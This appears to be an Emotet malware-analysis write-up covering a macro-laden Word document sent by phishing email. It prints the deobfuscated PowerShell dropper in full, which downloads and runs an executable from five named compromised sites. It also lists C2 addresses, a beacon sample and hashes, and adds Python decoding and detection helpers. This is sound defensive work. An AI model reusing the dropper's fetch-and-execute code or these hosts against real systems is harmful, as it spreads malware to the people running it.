suspicious word doc

Intro

We received another suspicious phishing email from cantd@canifa.com at approximately 13:21 on Friday 02/05/2019.

Email subject:

  • Payroll

Attachments: none, but the body contained a link to a macro-enabled Word document. The anchor was used to disguise the real hosting domain: the visible link text showed a fake domain belonging to the target (e.g. http://security.example.com/…) while the underlying href pointed at the actual hosting server. The linked document was seen under the following names:

  • 216937657718.doc
  • companyname_6006767054US_May_03_2019.doc

When opened, the document looks like this:

[Image: emotet word doc]

Trying oletools

Using the open-source oletools package (olevba) we can quickly scan the document (or a .pub Publisher file, which this campaign also used) for suspicious or malicious VBA calls:

python2 ./olevba.py  ../../word.docm 
olevba 0.54.2 on Python 2.7.16 - http://decalage.info/python/oletools
===============================================================================
FILE: ../../word.docm
Type: OLE
-------------------------------------------------------------------------------
...

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

...

CyberChef recipe to decode the above payload:

Once decoded, the PowerShell payload is much easier to read. The random string assignments scattered through it are junk inserted to defeat static signatures; only the WebClient download loop does any work (comments added):

$n78907 = 'b4242666';                                 # junk
$p_6286 = '685';                                      # basename of the dropped file
$w172778 = 't872998';                                 # junk
$Q__01761 = $env:userprofile + '\'+$p_6286+'.exe';    # drop path: %USERPROFILE%\685.exe
$b25831='o3451631';                                   # junk
$k93_54_=&('new-object') neT.WEBCLiEnT;               # System.Net.WebClient, mixed case to evade keyword matching
# five payload URLs joined with '@'; the script tries them in order
$s227881='http://duanlocphatresidence.com/wp-admin/b8oyf2_w724r5u-66253/@http://superwhite.com.au/wp-content/2t9x_bmoau88p-89600496/@http://pneumorek.ma/calendar/EckAzvvl/@http://pure-vapedistribution.be/p52r/js74mi_zk0p5orhwa-651/@http://nitincarcare.com/wp-content/BbayinbUK/'.SPliT('@');
$I61229='s91640';                                     # junk
foreach($U037615 in $s227881){
    try{
        $k93_54_.dOWnLoadFIlE($U037615, $Q__01761);   # download to the drop path
        $I41407='s661024';                            # junk
        # only run it if the file is at least 21324 bytes, i.e. a real binary rather than an error page
        If ((.('Get-Item') $Q__01761).LEngtH -ge 21324) {
            .('Invoke-Item') $Q__01761;               # execute the dropped binary
            $Z925_70='W04062';                        # junk
            break;                                    # stop at the first URL that worked
            $v_55775='S8285_5'                        # junk (unreachable)
        }
    }
    catch{
    }                                                 # swallow errors and move on to the next URL
}
$c295658='m78__10'                                    # junk
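The two steps the CyberChef recipe performs can be reproduced in a few lines of Python. The following is an added example and not part of the original analysis: it decodes a `-EncodedCommand` blob (Base64 over UTF-16LE, which is how a macro typically hands a script to powershell.exe; the encoded blob from this sample is not reproduced above, so the example re-encodes the decoded payload to produce one) and then pulls the download URLs, the resolved drop path, the size check and the execution verb out of the script with regular expressions. The patterns are tuned to this sample's obfuscation style (single-quoted string variables, an '@'-joined URL list, `.Length -ge N`) and are an assumption for other variants.

```python
import base64
import re

# Sample input: the deobfuscated dropper from this post, embedded verbatim.
DECODED_PAYLOAD = r"""$n78907 = 'b4242666';
$p_6286 = '685';
$w172778 = 't872998';
$Q__01761 = $env:userprofile + '\'+$p_6286+'.exe';
$b25831='o3451631';
$k93_54_=&('new-object') neT.WEBCLiEnT;
$s227881='http://duanlocphatresidence.com/wp-admin/b8oyf2_w724r5u-66253/@http://superwhite.com.au/wp-content/2t9x_bmoau88p-89600496/@http://pneumorek.ma/calendar/EckAzvvl/@http://pure-vapedistribution.be/p52r/js74mi_zk0p5orhwa-651/@http://nitincarcare.com/wp-content/BbayinbUK/'.SPliT('@');
$I61229='s91640';
foreach($U037615 in $s227881){
    try{
        $k93_54_.dOWnLoadFIlE($U037615, $Q__01761);
        $I41407='s661024';
        If ((.('Get-Item') $Q__01761).LEngtH -ge 21324) {
            .('Invoke-Item') $Q__01761;
            $Z925_70='W04062';
            break;
            $v_55775='S8285_5'
        }
    }
    catch{
    }
}
$c295658='m78__10'
"""


def encode_command(script: str) -> str:
    """Build the -EncodedCommand form of a script: Base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """Reverse of encode_command: the 'From Base64' + 'Decode text (UTF-16LE)' steps."""
    return base64.b64decode(blob).decode("utf-16-le")


# Patterns assumed for this sample's obfuscation style (hypothetical for other variants).
URL_RE = re.compile(r"https?://[^\s'\"@]+")
STR_VAR_RE = re.compile(r"\$(?P<name>\w+)\s*=\s*'(?P<val>[^']*)'")
DROP_PATH_RE = re.compile(r"\$env:userprofile\s*\+\s*'\\'\s*\+\s*\$(\w+)\s*\+\s*'(\.\w+)'", re.IGNORECASE)
SIZE_CHECK_RE = re.compile(r"\.length\s*-ge\s*(\d+)", re.IGNORECASE)
EXEC_RE = re.compile(r"(Invoke-Item|Start-Process|Invoke-Expression)", re.IGNORECASE)


def extract_iocs(script: str) -> dict:
    """Pull download URLs, resolved drop path, minimum-size check and execution verb out of the script."""
    # every single-quoted string assignment, so the drop-path basename variable can be resolved
    strings = {m.group("name"): m.group("val") for m in STR_VAR_RE.finditer(script)}
    drop_path = None
    m = DROP_PATH_RE.search(script)
    if m:
        # e.g. $p_6286 -> '685', giving %USERPROFILE%\685.exe
        drop_path = "%USERPROFILE%\\" + strings.get(m.group(1), "?") + m.group(2)
    size = SIZE_CHECK_RE.search(script)
    execv = EXEC_RE.search(script)
    return {
        "urls": URL_RE.findall(script),
        "drop_path": drop_path,
        "min_size": int(size.group(1)) if size else None,
        "exec": execv.group(1) if execv else None,
    }


if __name__ == "__main__":
    blob = encode_command(DECODED_PAYLOAD)          # stands in for the blob olevba shows
    iocs = extract_iocs(decode_encoded_command(blob))
    for url in iocs["urls"]:
        print("url", url)
    print("drop", iocs["drop_path"], "min_size", iocs["min_size"], "exec", iocs["exec"])
```

The size threshold is worth recording alongside the URLs: when a payload host has already been cleaned up and serves a small HTML error page, the dropper silently skips it, so a download that looks successful in a proxy log did not necessarily lead to execution.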

The Dropper

Each of the above URLs served the same binary (hashes in the IoCs section), which has already been uploaded to VirusTotal and Any.run.

Once running, the binary beaconed to a C2 on 82.28.208.186 with the classic Emotet signature: an HTTP POST whose form body is a single randomly named field carrying a long URL-encoded Base64 value (note the %2F, %2B and trailing %3D):

0Zb0PsTNBG33E1=YVbXaXOrLkFbkWI%2FydJ2bVolJaIHbZQVEZ7s7erE4Qmktkv9JavzV9487y%2FTcXv9D7icj192%2FGyEr7kQO8sKSR8bMYIxj%2BPiI7psB1t4XL%2FvwFK%2FTLXvrkTMCB7%2BGBiyCVkcroQFhe%2FKYQR4Bwlp7TOY1DkqfjunnL8uTWWAbT5D%2FyZlAgrCYr6hGx0PCw%2FHxPamAREbSrFuCQ6LBt7GZ61TTg4%2F%2FxwYFZcrEweGN1G9JvE4oILFmHq%2ButhDQix1FXyA7NhaZxyWcWTNO9Y6okafVLZxMo1oytOqCUd0YJkasb35laezPnzyPPSrki3zUojLF%2BjZLmsZHvZGpxBlpDN4Oy5bK0SMun7OmsKnLRpdg8ijWlJ0PEO29Rn1aOhzb2W0fetCcChfmfkB%2B%2BMtpfSYAMQ%3D
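As an added detection example (not from the original post), the following Python applies the shape of that beacon as a heuristic over constructed proxy-log entries: a POST whose body is exactly one form field with a random alphanumeric name and a long URL-encoded Base64 value. The first sample request reuses the body captured above; the others are constructed benign traffic. The field-name bounds and minimum value length are assumptions chosen to fit this sample, not values from a published signature.

```python
import re
from urllib.parse import unquote

# Constructed proxy-log entries as (method, url, body). The first body is the beacon
# captured from 82.28.208.186 in this post; the remaining entries are made-up benign traffic.
SAMPLE_REQUESTS = [
    ("POST", "http://82.28.208.186/arizona/jit/",
     "0Zb0PsTNBG33E1=YVbXaXOrLkFbkWI%2FydJ2bVolJaIHbZQVEZ7s7erE4Qmktkv9JavzV9487y%2FTcXv9D7icj192"
     "%2FGyEr7kQO8sKSR8bMYIxj%2BPiI7psB1t4XL%2FvwFK%2FTLXvrkTMCB7%2BGBiyCVkcroQFhe%2FKYQR4Bwlp7TOY1Dkq"
     "fjunnL8uTWWAbT5D%2FyZlAgrCYr6hGx0PCw%2FHxPamAREbSrFuCQ6LBt7GZ61TTg4%2F%2FxwYFZcrEweGN1G9JvE4oIL"
     "FmHq%2ButhDQix1FXyA7NhaZxyWcWTNO9Y6okafVLZxMo1oytOqCUd0YJkasb35laezPnzyPPSrki3zUojLF%2BjZLmsZ"
     "HvZGpxBlpDN4Oy5bK0SMun7OmsKnLRpdg8ijWlJ0PEO29Rn1aOhzb2W0fetCcChfmfkB%2B%2BMtpfSYAMQ%3D"),
    ("POST", "http://intranet.example/login", "username=alice&password=hunter2&remember=1"),
    ("POST", "http://api.example/v1/search", "q=emotet%20ioc"),
    ("POST", "http://cdn.example/upload", "data=" + "A" * 200),   # long value but an ordinary field name
    ("GET", "http://82.28.208.186/entries/ban/ringin/", ""),
]

# Thresholds are assumptions fitted to this sample.
KEY_RE = re.compile(r"^[A-Za-z0-9]{8,40}$")        # random-looking alphanumeric field name
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")     # Base64 alphabet, optional trailing padding
MIN_VALUE_LEN = 64                                  # encrypted beacons are far longer than this


def looks_like_emotet_beacon(method: str, body: str) -> bool:
    """Heuristic: POST with exactly one form field, random alnum name, long URL-encoded Base64 value."""
    if method != "POST" or "&" in body or "=" not in body:
        return False
    key, _, value = body.partition("=")
    value = unquote(value)                          # %2F -> /, %2B -> +, %3D -> =
    return bool(KEY_RE.match(key)) and len(value) >= MIN_VALUE_LEN and bool(B64_RE.match(value))


def scan(requests):
    """Return the URLs of the requests whose body matches the beacon shape."""
    return [url for method, url, body in requests if looks_like_emotet_beacon(method, body)]


if __name__ == "__main__":
    for url in scan(SAMPLE_REQUESTS):
        print("possible Emotet C2 beacon:", url)
```

This matches on body shape only; in practice it should be combined with the destination (direct-to-IP POSTs on unusual ports such as 443, 8080 or 50000 without TLS, as in the IoCs below) to keep the false-positive rate down, because a single-field Base64 POST is not unique to Emotet.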

We can also use VirusTotal's Graph feature to pivot from the document and dropper hashes to additional documents and C2 endpoints:

[Image: Emotet VT Graph 201905]

IoCs

Payload URLs from the PowerShell dropper (with the IP each resolved to at the time of analysis):

  • http://duanlocphatresidence.com/wp-admin/b8oyf2_w724r5u-66253/  45.252.248.18
  • http://superwhite.com.au/wp-content/2t9x_bmoau88p-89600496/  27.50.89.204
  • http://pneumorek.ma/calendar/EckAzvvl/  88.99.143.205
  • http://pure-vapedistribution.be/p52r/js74mi_zk0p5orhwa-651/  178.32.59.84
  • http://nitincarcare.com/wp-content/BbayinbUK/  103.14.96.71

C2 URLs:

  • http://82.28.208.186/arizona/jit/  82.28.208.186
  • http://82.28.208.186/entries/ban/ringin/  82.28.208.186
  • http://73.49.109.200:443/entries/  73.49.109.200
  • http://189.183.234.170:50000/arizona/  189.183.234.170
  • http://189.183.234.170/raster  189.183.234.170
  • http://86.122.149.86:8080/window/  86.122.149.86
  • http://190.25.255.98/scripts/loadan  190.25.255.98

Hashes:

  • docm MD5: f77b8c61763ed3ea085c6f8addcb8c1f
  • docm SHA1: db8e8a755667b491373c32ce5a9e81025346fea4
  • docm SHA256: 4221a9922d97fa329b3dbb27e37522448958cbfa186a6ef722e48d63f9753808
  • dropper MD5: 0E9F0C323DEA9C34EEFD5C86B036923A
  • dropper SHA1: DD825842FBA66E759F76661A4FF0D93861995AE7
  • dropper (soundser.exe) SHA256: A4557FD54E922777A7F0F49A206785DA98E984BB63DB86054535FCEE253E2A72

VBA macro stream: Macros/VBA/N6783_85
